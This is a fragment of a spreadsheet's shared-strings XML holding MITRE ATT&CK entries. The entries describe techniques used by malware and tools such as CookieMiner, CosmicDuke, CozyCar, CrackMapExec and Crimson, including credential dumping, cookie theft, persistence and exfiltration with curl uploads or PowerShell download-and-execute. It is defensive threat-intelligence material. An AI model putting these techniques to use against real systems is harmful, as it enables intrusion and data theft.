  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has retrieved iPhone text messages from iTunes phone backup files.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>relationship--aff9bcd9-34b9-4c94-9ce0-dd4852118f91</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has used Google Chrome's decryption and extraction operations.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>relationship--8bed4012-0b27-409b-8236-1b5238dd477d</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has checked for the presence of "Little Snitch", macOS network monitoring and application firewall software, stopping and exiting if it is found.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>relationship--a2c599c5-be26-4837-a613-b7d74446247c</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has used the &lt;code&gt;curl --upload-file&lt;/code&gt; command to exfiltrate data over HTTP.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>relationship--22d01548-0512-4acb-a386-51ec7a822329</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has looked for files in the user's home directory with "wallet" in their name using &lt;code&gt;find&lt;/code&gt;.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>relationship--5ea439b8-ca9d-462b-9bb5-e0f13651b10c</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) can download additional scripts from a web server.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>relationship--7f249ef4-8a3c-4ab5-998f-256ac8ecf588</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has installed multiple new Launch Agents in order to maintain persistence for cryptocurrency mining software.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>relationship--e1f316bc-b215-4a72-9108-7c5bd69f0454</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has used python scripts on the user’s system, as well as the Python variant of the [Empire](https://attack.mitre.org/software/S0363) agent, EmPyre.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>relationship--e2a29101-0b7e-4dab-adec-602712c09893</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has loaded coinmining software onto systems to mine for Koto cryptocurrency. (Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>relationship--46af303d-51d3-4b85-90e2-ee75f62c022c</t>
  </si>
  <si>
    <t>relationship--bd17ac4f-746a-4299-b9cc-ff587c57e4f2</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) can steal Google Chrome and Apple Safari browser cookies from the victim’s machine. (Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>relationship--474e148d-4f4a-41d4-994e-d6425c7445f3</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has used a Unix shell script to run a series of commands targeting macOS.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>relationship--dcbe360b-c7d3-45bd-a1ef-a13bc2a562fe</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) exfiltrates collected files automatically over FTP to remote servers.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>relationship--d8ac067b-f246-40bb-98bd-fcff74092139</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) copies and exfiltrates the clipboard contents every 30 seconds.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>relationship--66625422-17cd-4b04-beb5-fa2eabe350ad</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) collects user credentials, including passwords, for various programs including popular instant messaging applications and email clients as well as WLAN keys.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--4d7add6f-ebd5-477f-9958-a5176835da2e</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) collects user credentials, including passwords, for various programs including Web browsers.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--62943e4f-a181-4eb2-84a4-27ed3e7308af</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) steals user files from local hard drives with file extensions that match a predefined list.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>relationship--dad229e7-fcc6-4c1d-99c3-47d54fbc6892</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) steals user files from network shared drives with file extensions and keywords that match a predefined list.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>relationship--3e7c9978-4db1-4ee1-ae27-640acee5a543</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) steals user files from removable media with file extensions and keywords that match a predefined list.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>relationship--ff61ebde-befe-488a-89d0-dc4c49e60d59</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>relationship--3d4dabc2-3bee-409a-a05d-e107677cfdc7</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) attempts to exploit privilege escalation vulnerabilities CVE-2010-0232 or CVE-2010-4398.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--63f0007e-833e-4d6a-b79e-873525979f40</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) searches attached and mounted drives for file extensions and keywords that match a predefined list.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>relationship--62507790-a137-409e-a655-9190ff78cb52</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) uses a keylogger.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--6d2d4146-bf9e-4b75-9a23-052c09e99eeb</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) collects LSA secrets.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--2625dfe6-7c02-4df7-b98f-dbfedb2d104b</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>relationship--bcb8ac03-4f58-4cd8-af58-c3df991c8af5</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) uses scheduled tasks typically named "Watchmon Service" for persistence.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>relationship--e32b53b5-b112-483a-8d95-56bf3f43671f</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) takes periodic screenshots and exfiltrates them.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>relationship--7331b11d-1d5e-4275-ba7e-a83ec4a59259</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) collects Windows account hashes.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--d01869cb-74bb-4ad9-ac5e-9c7706f323d1</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) contains a custom version of the RC4 algorithm that includes a programming error.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>relationship--fbae4191-679a-45b2-8ebb-8adb5348f4d0</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) can use HTTP or HTTPS for command and control to hard-coded C2 servers.(Citation: F-Secure The Dukes)(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>relationship--a9727d1b-777a-4c3e-8bcc-e0cbff7431d8</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) uses Windows services typically named "javamtsup" for persistence.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>relationship--17629f20-194c-48cb-aa1c-b3da2b6f06ba</t>
  </si>
  <si>
    <t>[CostaBricks](https://attack.mitre.org/software/S0614) has added the entire unobfuscated code of the legitimate open source application Blink to its code.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--8a8fa25a-8cc6-4bd1-a97a-a0d9df9c1507</t>
  </si>
  <si>
    <t>25 May 2021</t>
  </si>
  <si>
    <t>[CostaBricks](https://attack.mitre.org/software/S0614) has the ability to use bytecode to decrypt embedded payloads.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--f2d433c3-d134-4985-8dc1-b35d407b330a</t>
  </si>
  <si>
    <t>[CostaBricks](https://attack.mitre.org/software/S0614) has been used to load [SombRAT](https://attack.mitre.org/software/S0615) onto a compromised host.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--48652244-02b0-4a80-82a9-b99fca669d85</t>
  </si>
  <si>
    <t xml:space="preserve">[CostaBricks](https://attack.mitre.org/software/S0614) has used a number of API calls, including `VirtualAlloc`, `VirtualFree`, `LoadLibraryA`, `GetProcAddress`, and `ExitProcess`.(Citation: BlackBerry CostaRicto November 2020) </t>
  </si>
  <si>
    <t>relationship--f10beefd-2bc1-4657-9c55-0ee28905b9ac</t>
  </si>
  <si>
    <t>[CostaBricks](https://attack.mitre.org/software/S0614) can inject a payload into the memory of a compromised host.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--a08454ac-6680-4ea1-ab2a-f272f562fc25</t>
  </si>
  <si>
    <t>[CostaBricks](https://attack.mitre.org/software/S0614) can implement a custom-built virtual machine mechanism to obfuscate its code.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--66c79e9f-7528-4a14-9525-866325b6abce</t>
  </si>
  <si>
    <t>[CozyCar](https://attack.mitre.org/software/S0046) uses Twitter as a backup C2 channel to Twitter accounts specified in its configuration file.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>relationship--233d1a32-f826-4705-a535-806edee8a5aa</t>
  </si>
  <si>
    <t>[CozyCar](https://attack.mitre.org/software/S0046) has executed [Mimikatz](https://attack.mitre.org/software/S0002) to harvest stored credentials from the victim and further victim penetration.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>relationship--78c889da-e1e2-4230-a91d-9934627fecf6</t>
  </si>
  <si>
    <t>The payload of [CozyCar](https://attack.mitre.org/software/S0046) is encrypted with simple XOR with a rotating key. The [CozyCar](https://attack.mitre.org/software/S0046) configuration file has been encrypted with RC4 keys.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>relationship--91d4c776-c259-46b0-b511-b344ca027009</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</si>
  <si>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</si>
  <si>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relationship--327a64df-b405-453b-83d2-528d17e8df51</t>
  </si>
  <si>
    <t>The [CozyCar](https://attack.mitre.org/software/S0046) dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>relationship--a4a49b56-e220-4a81-a0da-43b63c012cfe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</si>
  <si>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</si>
  <si>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relationship--6e24d8d1-7376-493f-a85c-75448c80efed</t>
  </si>
  <si>
    <t>One persistence mechanism used by [CozyCar](https://attack.mitre.org/software/S0046) is to register itself as a scheduled task.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>relationship--ae38c68d-cc08-4460-9d98-ddf957f837e2</t>
  </si>
  <si>
    <t>Password stealer and NTLM stealer modules in [CozyCar](https://attack.mitre.org/software/S0046) harvest stored credentials from the victim, including credentials used as part of Windows NTLM user authentication.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>relationship--932fa199-f4c0-4c39-bb30-a412607ee299</t>
  </si>
  <si>
    <t>The main [CozyCar](https://attack.mitre.org/software/S0046) dropper checks whether the victim has an anti-virus product installed. If the installed product is on a predetermined list, the dropper will exit.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>relationship--330c8e43-575f-4c9a-b6c2-def7306841ad</t>
  </si>
  <si>
    <t>A system info module in [CozyCar](https://attack.mitre.org/software/S0046) gathers information on the victim host’s configuration.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>relationship--166c430d-0272-4dca-8d30-318cda0a0a63</t>
  </si>
  <si>
    <t>Some versions of [CozyCar](https://attack.mitre.org/software/S0046) will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>relationship--8f88490e-346b-4462-b077-0211707c21a3</t>
  </si>
  <si>
    <t>[CozyCar](https://attack.mitre.org/software/S0046)'s main method of communicating with its C2 servers is using HTTP or HTTPS.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>relationship--22301618-a676-4d94-975a-2a56e5a7f919</t>
  </si>
  <si>
    <t>A module in [CozyCar](https://attack.mitre.org/software/S0046) allows arbitrary commands to be executed by invoking &lt;code&gt;C:\Windows\System32\cmd.exe&lt;/code&gt;.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>relationship--04e4f0d1-32a9-4d64-a733-3316b0bf2740</t>
  </si>
  <si>
    <t>One persistence mechanism used by [CozyCar](https://attack.mitre.org/software/S0046) is to register itself as a Windows service.(Citation: F-Secure CozyDuke)</t>
  </si>
  <si>
    <t>relationship--cb0ebed2-4cac-437b-b5b2-37ee716af3f0</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can set a scheduled task on the target system to execute commands remotely using [at](https://attack.mitre.org/software/S0110).(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--54b3abf5-bc7c-4e8a-b51d-058cc313a3c9</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force supplied user credentials across a network range.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--fb0a3153-dbd8-4f32-8583-6a7e2fade337</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the domain user accounts on a targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--182ae728-bd77-41ca-bd0d-dd2b3d6cf50b</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can gather the user accounts within domain groups.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--cdcc30ba-b4be-469f-ae09-18913c53205d</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can discover specified filetypes and log files on a targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--b37173c1-b29d-4a95-b79c-787b1acab673</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can dump hashed passwords from LSA secrets for the targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--7644ad2b-1ee7-43f4-9b06-9928f6f9eb1a</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can create a registry key using wdigest.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--99eab281-6555-4aee-9d83-0e97bb3262ef</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can dump hashed passwords associated with Active Directory using Windows' Directory Replication Services API (DRSUAPI), or Volume Shadow Copy.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--10ecbc19-10ab-4564-a637-cc4f6773e533</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the shared folders and associated permissions for a targeted network.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--61d859c1-c6f4-4f5f-bc5f-032481dddbe4</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can pass the hash to authenticate via SMB.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--be8c0014-e10e-4854-8a5b-8a06e35a8623</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force passwords for a specified user on a single target system or across an entire network.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--5348c284-b5c7-4b30-a528-a9b0002ac8b9</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can discover the password policies applied to the target system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--11ca4266-5fca-4be4-9bce-275c655c66bd</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force credential authentication by using a supplied list of usernames and a single password.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--11027c06-b55a-4b0f-957c-f9f67daf21a7</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can execute PowerShell commands via WMI.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--d8ead39e-aa9f-44a7-ac5d-1a9b3bb46431</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can discover active IP addresses, along with the machine name, within a targeted network.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--63b477c5-b88b-469d-8b2a-bc30507de54f</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can dump usernames and hashed passwords from the SAM.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--099cdf98-eece-47a5-821f-f29b866699d6</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the system drives and associated system name.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--c42d1cc1-3685-4bd7-96ba-84a66cc6a287</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can collect DNS information from the targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--de55c190-81ee-49b8-a279-1692725ea6cc</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488) can discover active sessions for a targeted system.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>relationship--2e661579-5e24-486f-9c8e-624fb18b0b85</t>
  </si>
  <si>
    <t xml:space="preserve">[CrackMapExec](https://attack.mitre.org/software/S0488) can execute remote commands using Windows Management Instrumentation.(Citation: CME Github September 2018)	</t>
  </si>
  <si>
    <t>relationship--85ee8dfa-7f36-406a-a87c-97633530bdda</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) can use legitimate OAuth refresh tokens to authenticate with OneDrive.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--5fb6065d-398f-4655-9c57-cc4174f7a1a9</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) can use OneDrive for C2.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--5a73d370-7d3d-45ff-b096-acd5bcacad08</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) can upload files to C2 from victim machines.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--aef756f0-f34d-4cae-a16d-65e456f75c35</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) can use cloud services including OneDrive for data exfiltration.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--1cfb7192-6136-4946-8ee1-498f59125b9b</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) can specify the local file path to upload files from.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--95a8788a-b36c-4234-94bc-951eb1f72cce</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) can download files to the compromised host.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--ac5bf8d9-900b-4aa4-8f97-81566666cd26</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) can use Powershell for execution, including the cmdlets `Invoke-WebRequest` and `Invoke-Expression`.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--addc6473-9aa0-4c46-9e6a-2a58c47da0fe</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) can use HTTPS for C2 using the Microsoft Graph API.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--044afcd4-997f-4069-8600-a45bff6616c5</t>
  </si>
  <si>
    <t>[CreepySnail](https://attack.mitre.org/software/S1024) can use stolen credentials to authenticate on target networks.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--03a2f02b-ca0c-4366-8880-6cb6015fd722</t>
  </si>
  <si>
    <t>[CreepySnail](https://attack.mitre.org/software/S1024) can connect to C2 for data exfiltration.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--ca4d01b7-6e5b-4e4f-8b0a-2d1eaccefa01</t>
  </si>
  <si>
    <t>[CreepySnail](https://attack.mitre.org/software/S1024) can use PowerShell for execution, including the cmdlets `Invoke-WebRequst` and `Invoke-Expression`.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--bacf9dbb-7f22-4c72-8880-c6fc9fcf01ad</t>
  </si>
  <si>
    <t>[CreepySnail](https://attack.mitre.org/software/S1024) can use Base64 to encode its C2 traffic.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--97beb535-e226-4581-a329-de9fabe7a49d</t>
  </si>
  <si>
    <t>[CreepySnail](https://attack.mitre.org/software/S1024) can use `getmac` and `Get-NetIPAddress` to enumerate network settings.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--85d9203a-6600-4374-a70b-9864a12d7927</t>
  </si>
  <si>
    <t>[CreepySnail](https://attack.mitre.org/software/S1024) can execute `getUsername` on compromised systems.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--f130830a-f796-43a0-8415-58ad2b3aae63</t>
  </si>
  <si>
    <t>[CreepySnail](https://attack.mitre.org/software/S1024) can use HTTP for C2.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--360a4f50-968c-4206-9173-9155f646ab4a</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can perform audio surveillance using microphones.(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>relationship--77171992-6bae-442a-a790-b22982a29c8d</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a module to steal credentials from Web browsers on the victim machine.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>relationship--ed74954d-4717-4d63-9836-4cbd66c37345</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can collect information from a compromised host.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>relationship--64488756-c88f-4004-910b-47e8965d003e</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a module to collect data from removable drives.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>relationship--9ab576ed-2ba0-4fc5-87fc-2011a7cd183d</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can decode its encoded PE file prior to execution.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--4ffef54e-be6b-40cf-9446-d886f298d79c</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can exfiltrate stolen information over its C2.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>relationship--7953c8bf-2e44-45e9-90f5-4db5da4ad8c2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</si>
  <si>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</si>
  <si>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relationship--49855593-a473-4fd8-a40e-9b2435121208</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</si>
  <si>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</si>
  <si>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relationship--0d8aa058-426a-45c9-af5b-898746ae5862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</si>
  <si>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</si>
  <si>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relationship--a0186caf-482a-4f2a-bf2f-cac9fc51244a</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</si>
  <si>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</si>
  <si>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relationship--5dcc3242-4a1e-4789-b70e-be6c66534e61</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect and exfiltrate emails from Outlook.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--892ff1d1-3da9-489e-89c3-374ab07a417b</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can set a Registry key to determine how long it has been installed and possibly to indicate the version number.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--924b50b9-7de3-4036-b732-c87d08971122</t>
  </si>
  <si>
    <t xml:space="preserve">[Crimson](https://attack.mitre.org/software/S0115) uses a custom TCP protocol for C2.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)	 </t>
  </si>
  <si>
    <t>relationship--d6c628b9-789a-416b-8abe-cd457e566346</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) has the ability to discover pluggable/removable drives to extract files from.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>relationship--94a9ee1e-ac65-47aa-a8f4-6695f02d6040</t>
  </si>
  <si>
    <t>10 September 2021</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</si>
  <si>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</si>
  <si>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relationship--84f40044-00a2-4015-be0d-1bb0107ef42b</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</si>
  <si>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</si>
  <si>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relationship--e1caf917-c15f-4388-8ca0-6cdefd01da8f</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can add Registry run keys for persistence.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>relationship--3216e004-d8fe-4475-a107-8c3ad92f0fd8</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can spread across systems by infecting removable media.(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>relationship--9e70e248-2335-45ba-ae58-b162bc6b9bf4</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to perform screen captures.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>relationship--717d87d5-df97-48a9-8766-c9a947541e1d</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect information about anti-virus software on the victim.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>relationship--198d7156-eff4-4a6e-8e59-ab8a656f77a8</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</si>
  <si>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</si>
  <si>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relationship--4caf9f0d-dfe9-48ce-9b6e-812577e09711</t>
  </si>
  <si>
    <t xml:space="preserve">[Crimson](https://attack.mitre.org/software/S0115) can identify the geographical location of a victim host.(Citation: Kaspersky Transparent Tribe August 2020)	 </t>
  </si>
  <si>
    <t>relationship--9f918c84-29ac-4769-ba94-6b46c8ccb950</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect the victim MAC address and LAN IP.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>relationship--92711ee1-041b-4e35-a322-3e16790fcce2</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can identify the user on a targeted system.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)</t>
  </si>
  <si>
    <t>relationship--6cdada54-681f-47ac-834b-4d4e2c86ec75</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) has the ability to determine the date and time on a compromised host.(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>relationship--4a5b8515-18ee-45bb-a1e7-48ede93bf56a</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can determine when it has been installed on a host for at least 15 days before downloading the final payload.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--53f5aaf3-b4de-4e31-bf50-a297bb8b61ca</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can capture webcam video on targeted systems.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>relationship--0ebd7231-9228-44b6-a4d8-9131eb40bbb3</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) can use a HTTP GET request to download its final payload.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--5ece2c1b-6685-4490-ae4f-6340d205625c</t>
